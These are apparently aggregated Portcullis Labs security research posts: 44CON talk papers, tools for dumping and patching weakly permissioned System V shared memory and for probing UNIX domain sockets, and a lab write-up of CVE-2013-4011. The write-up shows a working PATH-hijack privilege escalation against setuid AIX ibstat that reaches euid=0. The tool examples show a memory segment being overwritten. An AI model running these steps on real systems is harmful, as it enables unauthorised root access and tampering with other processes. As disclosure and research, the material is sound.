This talk references previous presentations including:

• “I miss LSD“
• “Big Game Hunting: Simple techniques for bug hunting on big iron UNIX“
• “Breaking the Links: Exploiting the Linker“

44CU.pdf
June 20, 2014

247.5 KiB
MD5 hash: 22527f212e79dffdb8a91c56b878130f
Details

Date:

June 20, 2014

The post 44CON uncovered appeared first on Portcullis Labs.

What follows should, however, provide a high-level summary of issues, impacts and methods of remediation in cases where System V shared memory segments are used in an insecure fashion. This paper was released as part of my presentation at 44CON 2013 entitled “I miss LSD“.

MSAOSVSM.pdf
November 13, 2013

569.3 KiB
MD5 hash: 2511c7c09b51f39b74f37ed5e79fe1b5
Details

Date:

November 13, 2013

The post Memory Squatting: Attacks On System V Shared Memory appeared first on Portcullis Labs.

Key features

• Allows dumping of segments in a variety of formats including JPEGs
• Allows patching of segments

Overview

System V shared memory segments created with shmget() are assigned an owner, a group and a set of permissions intended to limit access to the segment to designated processes only. The owner of a shared memory segment can change the ownership and permissions on a segment after its creation using shmctl(). Any subsequent processes that wish to attach to the segment can only do so if they have the appropriate permissions. Once attached, the process can read or write to the segment, as per the permissions that were set when the segment was created.

smaSHeM takes advantage of applications that set weak permissions on such segments, allowing an attacker to dump or patch their contents. As discussed in my presentation at 44CON 2013 entitled “I miss LSD“, in the case of many X11 applications it is possible to extract pixmaps of previously rendered GUI artifacts. When compiled with QtCore linking enabled, smaSHeM aids in that process by brute forcing potentially valid dimensions for the raw pixmap dump.

Installation

$ ./configure [--with-qtcore] && make && make install

Usage

$ smaSHeM -v | -i <shmemid> -l <shmemlength> <-@ <patchoffset> -s <patchstring> | -d [-p | -c | -P | -j -x <xstart> -X <endx> -y <starty> -Y <yend>]>

Examples

Dumping the contents of a System V shared memory segment prettily:

$ smaSHeM -i 94273546 -l 459200 -d -P
0xf32fa000      00 00 00 00 1a 1a 1a 1a ........
0xf32fa008      7d 7d 7d 7d a7 a7 a7 a7 ........
0xf32fa010      af af af af af af af af ........
0xf32fa018      af af af af af af af af ........
0xf32fa020      af af af af af af af af ........
0xf32fa028      af af af af af af af af ........
0xf32fa030      af af af af af af af af ........
0xf32fa038      af af af af af af af af ........
0xf32fa040      af af af af af af af af ........
0xf32fa048      af af af af af af af af ........
0xf32fa050      af af af af af af af af ........
0xf32fa058      af af af af af af af af ........
0xf32fa060      af af af af af af af af ........
0xf32fa068      af af af af af af af af ........
0xf32fa070      af af af af af af af af ........
0xf32fa078      af af af af af af af af ........
...

Patching a segment:

$ smaSHeM -i 41779331 -l 2640 -@ 0 -s `perl -e 'print "A"x1024'`

Dumping the contents of a segment as a set of JPEGs with dimensions 0-300×30 (required QtCore):

$ smaSHeM -i 41779331 -l 2640 -d -J -x 0 -X 300 -y 30 -Y 30

smaSHeM-0.4.tar.gz
November 12, 2013

210.0 KiB
MD5 hash: 2e30e4edd2faf5946b6c0e1a244fd0ba
Details

Date:

November 12, 2013

The post smaSHeM appeared first on Portcullis Labs.

A wise man once said (paraphrased) “if you want to find UNIX bugs, compare and contrast the Linux and Solaris man pages”. Following on from my previous work on linker bugs and more recently AIX (at 44CON 2012), we’ll look at some of the more interesting areas of the POSIX specification, focusing on the various IPC mechanisms that can be found in modern POSIX alike OS as well as kernel land more generally. The talk included some new tools I’ve written (to be published in due course) to aid in this analysis along with some discussion around how I uncovered potentially exploitable bugs in ~400 Debian GNU/Linux packages in a single day.

This talk was based around the recently released whitepaper “Memory Squatting: Attacks On System V Shared Memory“.

Tools referenced in this talk include:

• UNIXSocketScanner
• smaSHeM

IML44C.pdf
September 29, 2013

244.4 KiB
MD5 hash: 3dbaf8ee9413111d8284f4b1f2dc5aa1
Details

Date:

September 29, 2013

The post I miss LSD appeared first on Portcullis Labs.

The advisory concerned AIX (one of my favourite operating systems to pwn) and related to a potential privilege escalation vulnerability in AIX 6.1 and AIX 7.1′s ibstat command which has setUID root permissions set on it. The fact that it affects AIX 7.1 was particularly interesting because this is the most recent release.

It’s fair to say that there are a substantial number of such vulnerabilities in AIX 7.1 but my interest was peaked because it wasn’t one that we’d found.

To start with, I grabbed a copy of the efix and extracted it. You’ll notice that the tarball referenced within the advisory contains patches for all supported AIX releases which are delivered as compressed epkg files. It might not be immediately clear but these are actually just tarballs with some meta data describing the patched files. So let’s extract one and take a look:

$ tar xvf iv43580m2a.130619.epkg
x ./ecfile, 837 bytes, 2 media blocks.
...
x ./EFILE1, 47516 bytes, 93 media blocks.
x ./EFILE2, 17576 bytes, 35 media blocks.
...
$ cat ecfile
...
EFIX_FILE:
EFIX_FILE_NUM=1
...
TARGET_FILE=/usr/sbin/ibstat
...
EFIX_FILE:
EFIX_FILE_NUM=2
...
TARGET_FILE=/usr/sbin/arp.ib
...

I’ve stripped out the less interesting bits of ecfile but we can clearly see that this patches two files, /usr/sbin/ibstat and /usr/sbin/arp.ib.

So the next question is that have they actually changed? My first thought was to objdump the two binaries and compare the output. This should give us a clear idea of what libc function calls are being utilised (and thus what the vulnerability is likely to be) however they had been stripped of all symbols which would make this a long and tedious process. So what else can we do? Well, knowing what classes of vulnerability AIX commonly falls foul of, I figured there was a reasonable likelihood that the vulnerability pertained to some kind of command injection, so I ran strings across the vulnerable binary to see if it was possible in this case:

$ strings /usr/sbin/ibstat
@(#)23 1.5 src/bos/usr/ccs/lib/libpthreads/init.c, libpth, bos53H, h2006_10B1 3/5/06 21:33:24
...
ifconfig %s
...

It certainly looked like this was a possibility, however I wanted to be sure. My next step was to run strings across the new binary and compare the output. For this, I used kompare:

Commands that have been removed from the binary

Commands that have been added to the binary

Now we can quite clearly see what has changed. It appears that in the vulnerable binary certain system commands are called, without a fully qualified path. What does this mean? Well, unless the ibstat binary correctly sanitises the PATH environment variable when it is called then binaries such as arp etc will be called by ibstat from the first matching directory specified in PATH.

What this means is that we can provide our own malicious binaries in a location which we control and have them executed as root when we run the ibstat binary (as it has setUID root permissions set).

We can prove this as follows:

$ ls -l dummybin/
total 8
lrwxrwxrwx 1 user staff 8 Jul 20 09:59 arp -> ifconfig
-rwxr-xr-x 1 user staff 49 Jul 20 10:55 ifconfig
lrwxrwxrwx 1 user staff 8 Jul 20 09:59 lsattr -> ifconfig
$ cat dummybin/ifconfig
#!/bin/sh

echo $0
echo $1
echo $2
id
sleep 1000
$ PATH=/home/user/ibstat/dummybin:/usr/bin:/etc:/usr/sbin:/usr/ucb /usr/sbin/ibstat -a lo0

===============================================================================
IB INTERFACE ARP TABLE
===============================================================================
/home/user/ibstat/dummybin/arp
-t
ib
uid=208(user) gid=1(staff) euid=0(root)

And there you have it, euid=0 in under half an hour.

If you enjoyed this write up be sure to get yourself a ticket for 44CON where I will be presenting the next round of our more detailed research into modern POSIX alike OS, including how I uncovered potentially exploitable bugs in ~400 Debian GNU/Linux packages in a single day.

The post In the lab, popping CVE-2013-4011 for AIX 7.1… appeared first on Portcullis Labs.

Key features

• Multi threaded
• Supports both internal probes format and nmap probes format

Overview

UNIX domain sockets are “files” that follow the semantics of the UNIX socket interface and can be utilised by applications to offer services to other processes that are present on the same host. Whilst it can often be clear what protocols such services support from the name of the socket and/or the process that created it, this is not always the case especially if the process isn’t part of a well known F/OSS application.

UNIXSocketScanner allows the UNIX domain sockets offered by a given application to be enumerated using both nmap and internal probes to determine the likely protocol. As discussed in my presentation at 44CON 2013 entitled “I Miss LSD“, the results are sometimes surprising – who knew that CUPS offered HTTP over a UNIX domain socket?

Installation

UNIXSocketScanner does not require installation but simply requires that the necessary dependencies have been installed.

Usage

$ find / -type s | UNIXSocketScanner.pl [-v] -x <maximumprocess> <-p <probesfilename> | -n <nmapprobesfilename>>

Examples

Scanning the CUPS UNIX domain socket:

$ echo /var/run/cups/cups.sock | UNIXSocketScanner.pl -x 2 -n /usr/share/nmap/nmap-service-probes
I: /var/run/cups/cups.sock
I: /var/run/cups/cups.sock finished
/var/run/cups/cups.sock
+ matches nmap-response-ssl
+ matches nmap-probe-SSLSessionReq
+ matches nmap-probe-GetRequest
+ matches nmap-response-ipp
+ matches nmap-probe-SSLv23SessionReq
+ matches nmap-probe-HTTPOptions

Connecting to the Avahi UNIX domain socket manually with socat:

$ socat UNIX:/var/run/cups/cups.sock STDIO
HEAD / HTTP/1.0

HTTP/1.0 200 OK
Date: Tue, 12 Nov 2013 22:50:04 GMT
Server: CUPS/1.5
Content-Language: en_US
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 18 Mar 2013 14:36:53 GMT
Content-Length: 3796

Scanning the Avahi UNIX domain socket:

$ echo /var/run/avahi-daemon/socket | UNIXSocketScanner.pl -x 2 -p src/probes
I: /var/run/avahi-daemon/socket
I: /var/run/avahi-daemon/socket finished
/var/run/avahi-daemon/socket
+ matches avahi-fuck

Connecting to the Avahi UNIX domain socket manually with socat:

$ socat UNIX:/var/run/avahi-daemon/socket STDIO
FUCK
+ FUCK: Go fuck yourself!

UNIXSocketScanner-0.4.tar.gz
April 26, 2013

5.3 KiB
MD5 hash: ccf7b78735ca12eb2d7195c1193979ba
Details

Date:

April 26, 2013

The post UNIXSocketScanner appeared first on Portcullis Labs.